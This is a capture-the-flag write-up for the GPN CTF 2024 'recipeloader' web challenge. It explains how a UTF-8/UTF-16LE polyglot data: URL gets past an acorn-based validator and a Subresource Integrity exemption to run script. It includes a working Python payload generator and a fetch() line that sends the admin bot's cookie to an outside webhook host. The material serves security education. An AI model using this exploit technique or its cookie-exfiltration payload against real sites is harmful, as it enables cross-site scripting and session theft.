webfreehard

recipeloader

gpn24

Task: a client page validates a fetched JS 'recipe = \"...\"' with acorn then loads the same URL as a <script>, exempting data: URLs from SRI. Solution: build a UTF-8/UTF-16LE polyglot data: URL — UTF-8 view passes acorn's string-literal check, UTF-16LE view (honored by <script charset>) runs fetch() to exfiltrate the admin bot's flag cookie.

$ ls tags/ techniques/
cookie_exfiltrationsri_bypass_via_static_schemefetch_vs_script_decoding_differentialutf16le_utf8_polyglotascii_nul_interleaveacorn_parser_bypass

recipeloader — GPN CTF 2024 (gpn24)

Description

You can load a javascript recipe pls no(w) xss

English summary: A client page (http://localhost:1337/) takes a ?url= parameter, fetch()es it, validates the text as a strict recipe = "..." assignment using the acorn parser, then injects the same URL as a <script src=url>. Non-static URL schemes (http/https) are bound by Subresource Integrity (SRI), but "static" schemes (data:, blob:, ...) are exempted. An admin bot stores the flag in a normal, non-HttpOnly, same-origin cookie named flag on localhost:1337 and then visits an attacker-supplied URL. Goal: get XSS to exfiltrate that cookie.

Analysis

The vulnerable load pattern (index.html)

async function runScript(url) { const txt = await fetch(url).then(r => r.text()); if (!isRecipeAssignmentProgram(txt)) throw new Error("invalid recipe assignment program"); const s = document.createElement("script"); s.src = url; if (!isScriptStatic(url)) s.integrity = `sha256-${await sha256(txt)}`; document.head.appendChild(s); }

This is a classic check-then-load (TOCTOU) pattern: the validated bytes (txt from fetch) and the executed bytes (whatever <script src=url> resolves to) are two independent loads. The only thing keeping them identical is the SRI integrity attribute.

  • isRecipeAssignmentProgram(src) runs acorn with sourceType:"script" and demands EXACTLY: body.length === 1, a single ExpressionStatement that is an AssignmentExpression with operator "=", left = Identifier named recipe, right = a string Literal or expression-free TemplateLiteral. In other words the text must be exactly recipe = "...".
  • isScriptStatic(url) parses the URL and looks at the protocol:
    • staticProtos = [data, blob, javascript, mailto, resource, ssh, tel]no integrity.
    • nonstaticProtos = [file, ftp, http, https, urn, view-source, ws, wss]integrity applied.
    • Unknown protocol → throws.
  • sha256() uses Uint8Array.prototype.toBase64() to build the SRI digest.
  • After load, show() does recipeTarget.textContent = recipetextContent, so no direct HTML injection is possible; we genuinely need script execution.

The bot (admin.js)

  • GET /bot/run requires typeof url === 'string' && url.startsWith('http://localhost:1337').
  • Headless chromium (playwright) goes to http://localhost:1337, runs document.cookie = "flag" + process.env.FLAG (cookie name is flag, value is the flag), then navigates to the attacker URL, waits 10s, logs document.cookie, closes.

So the flag is a normal same-origin cookie. Any JS executing on localhost:1337 can read it and exfiltrate it.

The key weakness — SRI exemption + decoding differential

For http:///https:// the SRI binding makes the validated text and the executed script byte-identical, so they cannot diverge. But data: is in staticProtos, so no integrity is enforced. We just need ONE byte sequence that:

  1. when decoded by fetch().text() → passes the strict recipe = "..." acorn check, and
  2. when executed by <script src=...> → is arbitrary JavaScript.

The differential that makes this possible:

  • fetch('data:...').text() decodes the body as UTF-8 and IGNORES the ;charset= parameter. Verified empirically: fetch('data:text/plain;charset=UTF-16LE,AB') returns the 2 ASCII chars A, B — not one UTF-16 code unit.
  • <script src="data:...;charset=UTF-16LE,..."> HONORS the charset and decodes the same bytes as UTF-16LE before executing. Verified: a UTF-16LE-encoded window.__ran='YES' ran when loaded as a charset=UTF-16LE script.

Same bytes, two decodings → a UTF-8/UTF-16LE polyglot.

Solution

Polyglot construction

We force a UTF-8 prefix recipe =" (note the space before =) and fill the string body with ASCII characters interleaved with 0x00 NUL bytes. Acorn happily accepts raw NULs inside a string literal, so the UTF-8 view is a valid recipe = "<ascii+NULs>" assignment. In UTF-16LE each <asciichar>\x00 pair decodes to a clean ASCII char, so the UTF-16LE view reads as ordinary ASCII JavaScript.

Engineering constraints (all required):

  • Space before =. In UTF-16LE the bytes r e c i p e SP = " decode to a run of CJK code points (敲 楣 数 㴠 ...) that are all valid identifier characters, forming one valid JS identifier. Without the space, the 4th UTF-16 unit becomes U+223D (, a math symbol) which is not an identifier char and breaks the UTF-16 program.
  • Avoid " (0x22) and \ (0x5c) inside the UTF-8 string body — those bytes would prematurely close/escape the UTF-8 string literal. Use single quotes in the payload.
  • Parity / alignment. recipe =" is 9 bytes (odd). One filler byte 0x3d (=) is prepended to the payload so the first UTF-16 unit after the prefix (0x22 paired with 0x3dU+3D22, a valid identifier-continue char) keeps the leading identifier syntactically valid; the rest then sits on even byte boundaries for clean ascii+NUL interleaving. A trailing space byte is added before the closing " if needed to keep total length even (it falls inside the UTF-16 // comment).

Final UTF-16LE program that actually runs:

敲楣数㴠㴢=fetch('//<EXFIL_HOST>?'+document.cookie)//∠

In sloppy/script mode this assigns the fetch(...) result to an implicit global (allowed), and the trailing // comments out the leftover units (the closing-quote byte etc). The fetch leaks document.cookie to the attacker host.

Both views were validated programmatically: the UTF-8 view passes the exact acorn recipe = "..." predicate; the UTF-16LE view parses as a syntactically valid sloppy-mode script.

Reusable solver — gen_payload.py

#!/usr/bin/env python3 import sys, urllib.parse EXFIL = sys.argv[1] if len(sys.argv) > 1 else "EXFILHOST/exfil" TARGET = "http://localhost:1337/" def utf16_ascii(s): out = bytearray() for ch in s: c = ord(ch); assert c < 128, ch out += bytes([c, 0]) return bytes(out) pre = b'recipe ="' # space before = is required for UTF-16 alignment payload = "=fetch('//" + EXFIL + "?'+document.cookie)//" # no " or \ allowed content = bytes([0x3d]) + utf16_ascii(payload) body = pre + content full = body + b'"' if len(full) % 2 != 0: full = body + b' "' enc = ''.join('%%%02X' % b for b in full) data_url = 'data:text/javascript;charset=UTF-16LE,' + enc attack_url = TARGET + '?url=' + urllib.parse.quote(data_url, safe='') bot_url = 'http://localhost:1337/bot/run?url=' + urllib.parse.quote(attack_url, safe='') print("UTF-8 view:", full.decode('utf-8')) print("UTF-16 view:", full.decode('utf-16le')) print("DATA URL:\n" + data_url) print("ATTACK URL:\n" + attack_url) print("BOT URL:\n" + bot_url)

Delivery / exploitation steps

  1. Generate the data: URL with a readable exfil host (used webhook.site; created a token via POST https://webhook.site/token).
  2. Build the attack URL: http://localhost:1337/?url=<urlencoded data: URL>. It starts with http://localhost:1337, so it passes the bot's startsWith check.
  3. Submit to the bot: GET https://<instance>/bot/run?url=<urlencoded attack URL> → bot replies ok.
  4. The bot sets cookie flag+FLAG on localhost:1337, then visits the attack URL. The page fetch()es the data: URL (UTF-8 → valid recipe, passes validation, no SRI because data: is "static"), then loads the same data: URL as a <script charset=UTF-16LE> which executes the UTF-16 payload and fetches //webhook/?<document.cookie>.
  5. Poll the webhook; received ...?flagGPNCTF{url_p4RSIN6_15_HArd_EVEN_FOr_BrOw5ers} (cookie name flag + flag value).

The flag text itself confirms the bug class: "url parsing is hard even for browsers."

$ cat /etc/motd

Liked this one?

Pro unlocks every writeup, every flag, and API access. $9/mo.

$ cat pricing.md

$ grep --similar

Similar writeups